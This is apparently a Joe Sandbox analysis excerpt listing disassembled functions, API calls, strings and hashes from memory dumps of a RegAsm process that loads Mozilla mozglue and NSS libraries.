Opcode ID: b963f042dcbe62a36a1057d78e6afc829163736b64abc6fa0e21548bc570c04c
Instruction ID: d415427f461cff2bfb8b088a4792f7ec2193566c995571640a5212f2e44fed9b
Opcode Fuzzy Hash: b963f042dcbe62a36a1057d78e6afc829163736b64abc6fa0e21548bc570c04c
Instruction Fuzzy Hash: 64515F71E0012A8FCF08CFA8C995ABEBBB1FB89304F158629D855B7755C7316A46CB90

Function 6C74CDF0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6C74CEBD
memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6C74CEF5
memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6C74CF4E

Strings

0, xrefs: 6C74CF30

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: memcpy$memset
String ID: 0
API String ID: 438689982-4108050209
Opcode ID: 6aaa86780b46f336ac65b1c9f00c5e3a62837c84b91b8e35e174f096710908ec
Instruction ID: 16bdd90ed860428573128a8f95dcde8013c640ad3afdc97b1f8abe155211bf16
Opcode Fuzzy Hash: 6aaa86780b46f336ac65b1c9f00c5e3a62837c84b91b8e35e174f096710908ec
Instruction Fuzzy Hash: 2B510376A0025A8FCB00CF19C890A9ABBB5EF99300F19C59DD8595F351D731ED0ACBE0

Function 6C78E390 Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C78E3E4
AcquireSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C78E3F1
memset.VCRUNTIME140(?,00000000,?), ref: 6C78E4AB

Part of subcall function 6C755D40: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,6C77DC12,0000000E), ref: 6C755D66

ReleaseSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C78E4F5
GetCurrentThreadId.KERNEL32 ref: 6C78E577
AcquireSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C78E584
ReleaseSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C78E5DE
memset.VCRUNTIME140(?,00000000,00000000), ref: 6C78E6DA
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C78E864
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C78E883
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C78E8A6

Strings

MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C78E826
[I %d/%d] profiler_start, xrefs: 6C78EBB4
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C78E655
MOZ_PROFILER_STARTUP, xrefs: 6C78E5A1, 6C78E5FF
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C78E777
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C78E722
-21-2246122658-369X, xrefs: 6C78EADC

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreememset$Xbad_function_call@std@@malloc
String ID: -21-2246122658-369X$MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL$[I %d/%d] profiler_start
API String ID: 905598890-1685988782
Opcode ID: 21e09e7bf2341a4ad5d2801e925a6d25542d6997016fb4acc960c0abdd47e0bd
Instruction ID: 7573db24b72cf867335a1b7d305d6fb0dae12b71dfda423d83b5940e41338719
Opcode Fuzzy Hash: 21e09e7bf2341a4ad5d2801e925a6d25542d6997016fb4acc960c0abdd47e0bd
Instruction Fuzzy Hash: 5A419B74A0160ACFCB14CF68C584AAAB7B1FF4A304F10413DE96A5BB81D734EA54CBD0

Function 6C7A77D0 Relevance: 6.1, APIs: 4, Instructions: 113stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7A77FA
?StringToDouble@StringToDoubleConverter@double_conversion@@QBENPBDHPAH@Z.MOZGLUE(00000001,00000000,?), ref: 6C7A7829

Part of subcall function 6C77CC38: GetCurrentProcess.KERNEL32(?,?,?,?,6C7431A7), ref: 6C77CC45
Part of subcall function 6C77CC38: TerminateProcess.KERNEL32(00000000,00000003,?,?,?,?,6C7431A7), ref: 6C77CC4E

?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C7A789F
?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C7A78CF

Part of subcall function 6C744DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C744E5A
Part of subcall function 6C744DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C744E97

Part of subcall function 6C744290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C783EBD,6C783EBD,00000000), ref: 6C7442A9

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$DtoaProcessstrlen$Ascii@Builder@2@Builder@2@@Converter@CreateCurrentDecimalDouble@EcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestTerminateV12@
String ID:
API String ID: 2525797420-0
Opcode ID: 44b007919752d3f7bc577ff2d91b7e1dbf9c9b5276e0e01da39a663d1901fd48
Instruction ID: d31815cf004aa0e43984a2dd30ffea3eb1cbf23c58e19f99f9bd7a005498d1fe
Opcode Fuzzy Hash: 44b007919752d3f7bc577ff2d91b7e1dbf9c9b5276e0e01da39a663d1901fd48
Instruction Fuzzy Hash: DD41AC71A047469FD300DF29C48456AFBF4FF8A254F604A2EE4A987640DB30E55ACB92

Function 6C79DAE0 Relevance: 6.1, APIs: 4, Instructions: 113COMMON

Download Yara Rule

APIs

??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?,?,00000000,?,?,?,6C79DF7F,?,?,00000000,00000000,?,6C78DEFD), ref: 6C79DB86
??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?,?,?,?,00000000,?,?,?,6C79DF7F,?,?,00000000,00000000), ref: 6C79DC0E
free.MOZGLUE(?,?,?,?,?,?,00000000,?,?,?,6C79DF7F,?,?,00000000,00000000), ref: 6C79DC2E
free.MOZGLUE(?,?,?,?,?,?,?,00000000,?,?,?,6C79DF7F,?,?,00000000,00000000), ref: 6C79DC40

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: Impl@detail@mozilla@@Mutexfree
String ID:
API String ID: 3186548839-0
Opcode ID: 9473aba49d2291d9d6ea2e9825699f762de282819b669f5798fb9c5628055e2b
Instruction ID: 1625ddc2617584d1b04f9de54baf501c25daf5734d7f9f73e570b787e7cdaf66
Opcode Fuzzy Hash: 9473aba49d2291d9d6ea2e9825699f762de282819b669f5798fb9c5628055e2b
Instruction Fuzzy Hash: 4D4176756007009FC710CF35C588AAABBF6BFC9354F55882DE89A8B751EB31E844CB91

Function 6C786470 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000200), ref: 6C78649B

Part of subcall function 6C75CA10: malloc.MOZGLUE(?), ref: 6C75CA26

memset.VCRUNTIME140(00000000,00000000,00000200), ref: 6C7864A9

Part of subcall function 6C77FA80: GetCurrentThreadId.KERNEL32 ref: 6C77FA8D
Part of subcall function 6C77FA80: AcquireSRWLockExclusive.KERNEL32(6C7CF448,?,6C77FA1F,?,?,6C755407), ref: 6C77FA99

ReleaseSRWLockExclusive.KERNEL32 ref: 6C78653F
free.MOZGLUE(?), ref: 6C78655A

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
String ID:
API String ID: 3596744550-0
Opcode ID: 71048e7f4e2baadc5e539d779fd705371e7ecece738cff9579a2d517f11b5941
Instruction ID: 27c94f43a922b6974cce9e60207a3d89b86450f91f33a06fe65cab041fb6b345
Opcode Fuzzy Hash: 71048e7f4e2baadc5e539d779fd705371e7ecece738cff9579a2d517f11b5941
Instruction Fuzzy Hash: 453172B5A05305AFDB00DF14D98869EBBE4FF89314F10843DE95A97741DB30EA19CB92

Function 6C79A2B0 Relevance: 6.1, APIs: 4, Instructions: 90COMMON

Download Yara Rule

APIs

free.MOZGLUE(?), ref: 6C79A315
?_Xbad_function_call@std@@YAXXZ.MSVCP140(?), ref: 6C79A31F
free.MOZGLUE(00000000,?,?,?,?), ref: 6C79A36A

Part of subcall function 6C765E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C765EDB
Part of subcall function 6C765E90: memset.VCRUNTIME140(ewzl,000000E5,?), ref: 6C765F27
Part of subcall function 6C765E90: LeaveCriticalSection.KERNEL32(?), ref: 6C765FB2

Part of subcall function 6C792140: free.MOZGLUE(?,00000000,?,6C792126,00000000,?,?,6C7920F0,?,6C77FBD1,?,?,?,6C7CF430,?,?), ref: 6C79215D

free.MOZGLUE(00000000), ref: 6C79A37C

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: free$CriticalSection$EnterLeaveXbad_function_call@std@@memset
String ID:
API String ID: 700533648-0
Opcode ID: f965339592356350c0151413939715f9aee666d4d754d03aa72b17629f0c2634
Instruction ID: e8acea9f3fb403c634de6cf78f92d349d8e76f641bf9c9eba90f4a7f76972847
Opcode Fuzzy Hash: f965339592356350c0151413939715f9aee666d4d754d03aa72b17629f0c2634
Instruction Fuzzy Hash: 76210771A022249BCB009F06E608B9EBBB8EF86368F048025DD095BB01D731ED06C6D1

Function 6C77FF60 Relevance: 6.1, APIs: 4, Instructions: 83COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,80000001,80000000,?,6C79D019,?,?,?,?,?,00000000,?,6C78DA31,00100000,?), ref: 6C77FFD3
memcpy.VCRUNTIME140(00000000,?,?,?,6C79D019,?,?,?,?,?,00000000,?,6C78DA31,00100000,?,?), ref: 6C77FFF5
free.MOZGLUE(?,?,?,?,?,6C79D019,?,?,?,?,?,00000000,?,6C78DA31,00100000,?), ref: 6C78001B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,6C79D019,?,?,?,?,?,00000000,?,6C78DA31,00100000,?,?), ref: 6C78002A

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: memcpy$_invalid_parameter_noinfo_noreturnfree
String ID:
API String ID: 826125452-0
Opcode ID: 006fc67fd8a942d2bbb8aa2dc1a11ede549fbe80c00183f332b16fe1ef193e4b
Instruction ID: c188f6bb5fe0ea305594aaee4261ee644619b64236b4a3ea6423d3c0f06c2c31
Opcode Fuzzy Hash: 006fc67fd8a942d2bbb8aa2dc1a11ede549fbe80c00183f332b16fe1ef193e4b
Instruction Fuzzy Hash: C5210872A002155FDB189E7C9D984AFB7BAFB853243250338E525D7781EB70AD0182E1

Function 6C791B80 Relevance: 6.1, APIs: 4, Instructions: 77threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C791B98
AcquireSRWLockExclusive.KERNEL32(?,?,6C791D96,00000000), ref: 6C791BA1
ReleaseSRWLockExclusive.KERNEL32(?,?,6C791D96,00000000), ref: 6C791BB5
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C791C25

Part of subcall function 6C791C60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,6C79759E,?,?), ref: 6C791CB4

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentNow@ReleaseStamp@mozilla@@ThreadTimeV12@_free
String ID:
API String ID: 3699359333-0
Opcode ID: 615949b2b6d843fe208bd3c797ed6f54df1435f474071bf7a344c4ffcfd2318c
Instruction ID: a4ce33176cce7acda98f5f813fad2c453c2dd16fca9b95e4778044314ebca0b8
Opcode Fuzzy Hash: 615949b2b6d843fe208bd3c797ed6f54df1435f474071bf7a344c4ffcfd2318c
Instruction Fuzzy Hash: 9B21D370A042158FDB009F65E5887AFBBBDAF43748F10042DD9126BB41D775E925CBD0

Function 6C7A7B10 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C7A7B51
__aulldiv.LIBCMT ref: 6C7A7B6C
__aulldiv.LIBCMT ref: 6C7A7B8B
__aulldiv.LIBCMT ref: 6C7A7BB1

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: __aulldiv
String ID:
API String ID: 3732870572-0
Opcode ID: d00a51c4c5f930f9caa17efa13413b4b30e460f116377f5c22957434e894d04c
Instruction ID: fa67b13ce382b988a3a7e221fba9d6695e2831fabb25dccc39cd2370859a215f
Opcode Fuzzy Hash: d00a51c4c5f930f9caa17efa13413b4b30e460f116377f5c22957434e894d04c
Instruction Fuzzy Hash: 732163B1B006095FD724DF7DCD85EA777F8EB89754B10893DE01AD7750E674A8048BA0

Function 6C88ACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6C88ACC2

Part of subcall function 6C862F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C862F0A
Part of subcall function 6C862F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C862F1D

Part of subcall function 6C862AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6C860A1B,00000000), ref: 6C862AF0
Part of subcall function 6C862AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C862B11

CERT_DestroyCertList.NSS3(00000000), ref: 6C88AD5E

Part of subcall function 6C8A57D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C86B41E,00000000,00000000,?,00000000,?,6C86B41E,00000000,00000000,00000001,?), ref: 6C8A57E0
Part of subcall function 6C8A57D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C8A5843

CERT_DestroyCertList.NSS3(?), ref: 6C88AD36

Part of subcall function 6C862F50: CERT_DestroyCertificate.NSS3(?), ref: 6C862F65
Part of subcall function 6C862F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C862F83

free.MOZGLUE(?), ref: 6C88AD4F

Memory Dump Source

Source File: 00000003.00000002.2272879099.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true

Associated: 00000003.00000002.2271733381.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2291783107.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292436423.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292519358.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292589475.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292635391.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c7e0000_RegAsm.jbxd

Similarity

API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
String ID:
API String ID: 132756963-0
Opcode ID: 6daded8f3c2ed01bf85ae374600e3da1acde64e848c2cb2830e06b66b8d3ba03
Instruction ID: 21352aeaa1d4b865f03888621def78f859a076ca11f458657cc2fae278bacf3b
Opcode Fuzzy Hash: 6daded8f3c2ed01bf85ae374600e3da1acde64e848c2cb2830e06b66b8d3ba03
Instruction Fuzzy Hash: 8821F6B1D012049BEF20DF68DA055EEB7B4EF05209F154478D805BBB80FB35AA49CBE1

Function 6C8BECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6C8BF0AD,6C8BF150,?,6C8BF150,?,?,?), ref: 6C8BECBA

Part of subcall function 6C8C0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C8687ED,00000800,6C85EF74,00000000), ref: 6C8C1000
Part of subcall function 6C8C0FF0: PR_NewLock.NSS3(?,00000800,6C85EF74,00000000), ref: 6C8C1016
Part of subcall function 6C8C0FF0: PL_InitArenaPool.NSS3(00000000,security,6C8687ED,00000008,?,00000800,6C85EF74,00000000), ref: 6C8C102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6C8BECD1

Part of subcall function 6C8C10C0: TlsGetValue.KERNEL32(?,6C868802,00000000,00000008,?,6C85EF74,00000000), ref: 6C8C10F3
Part of subcall function 6C8C10C0: EnterCriticalSection.KERNEL32(?,?,6C868802,00000000,00000008,?,6C85EF74,00000000), ref: 6C8C110C
Part of subcall function 6C8C10C0: PL_ArenaAllocate.NSS3(?,?,?,6C868802,00000000,00000008,?,6C85EF74,00000000), ref: 6C8C1141
Part of subcall function 6C8C10C0: PR_Unlock.NSS3(?,?,?,6C868802,00000000,00000008,?,6C85EF74,00000000), ref: 6C8C1182
Part of subcall function 6C8C10C0: TlsGetValue.KERNEL32(?,6C868802,00000000,00000008,?,6C85EF74,00000000), ref: 6C8C119C

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6C8BED02

Part of subcall function 6C8C10C0: PL_ArenaAllocate.NSS3(?,6C868802,00000000,00000008,?,6C85EF74,00000000), ref: 6C8C116E

PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6C8BED5A

Memory Dump Source

Source File: 00000003.00000002.2272879099.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true

Associated: 00000003.00000002.2271733381.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2291783107.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292436423.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292519358.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292589475.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292635391.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c7e0000_RegAsm.jbxd

Similarity

API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
String ID:
API String ID: 2957673229-0
Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction ID: 5a1faced458b2f804db48a34e122fc957917f9eb78525010b539744554d9ee49
Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction Fuzzy Hash: BC2104B1A007425FE310CF29DA44B52B7E4BFA4309F19C669E80C97B61E7B0E590C7D1

Function 6C7AAAE0 Relevance: 6.1, APIs: 4, Instructions: 59threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C7AAAF8
EnterCriticalSection.KERNEL32(6C7CF770,?,6C76BF9F), ref: 6C7AAB08
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,6C76BF9F), ref: 6C7AAB39
LeaveCriticalSection.KERNEL32(6C7CF770,?,?,?,?,?,?,?,?,6C76BF9F), ref: 6C7AAB6B

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: CriticalSection$CurrentEnterLeaveThread_stricmp
String ID:
API String ID: 1951318356-0
Opcode ID: 7ce69aa27c1d011ee8c406009778dd909b4450c652f613c4a6cc994a0d5ec64a
Instruction ID: bc2a67f4d239b77e5b7170f5b828bd59301924f9f319ea324e7a563458a2196a
Opcode Fuzzy Hash: 7ce69aa27c1d011ee8c406009778dd909b4450c652f613c4a6cc994a0d5ec64a
Instruction Fuzzy Hash: 89114FB1E0020A9FCF00DFA8D98999BBBB9FF49314B040439E90597701E734EA19CBB1

Function 6C75B4E0 Relevance: 6.1, APIs: 4, Instructions: 54threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C75B4F5
AcquireSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C75B502
ReleaseSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C75B542
free.MOZGLUE(?), ref: 6C75B578

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: ae1804d75af52ecf7ce05aee833b46465b4dae774ea6725a0ea5ae97b66e984b
Instruction ID: c8c7b76c961e18c0bdfaf38beb690d6d4be1a6e614240e3e289d29fb2eebd09a
Opcode Fuzzy Hash: ae1804d75af52ecf7ce05aee833b46465b4dae774ea6725a0ea5ae97b66e984b
Instruction Fuzzy Hash: 3311E131A04B46CBD7118F69C604761B3B4FF96319F50972AEC4953A02EBB4B2D48790

Function 6C783DE0 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6C74F20E,?), ref: 6C783DF5
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6C74F20E,00000000,?), ref: 6C783DFC
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C783E06
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6C783E0E

Part of subcall function 6C77CC00: GetCurrentProcess.KERNEL32(?,?,6C7431A7), ref: 6C77CC0D
Part of subcall function 6C77CC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6C7431A7), ref: 6C77CC16

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
String ID:
API String ID: 2787204188-0
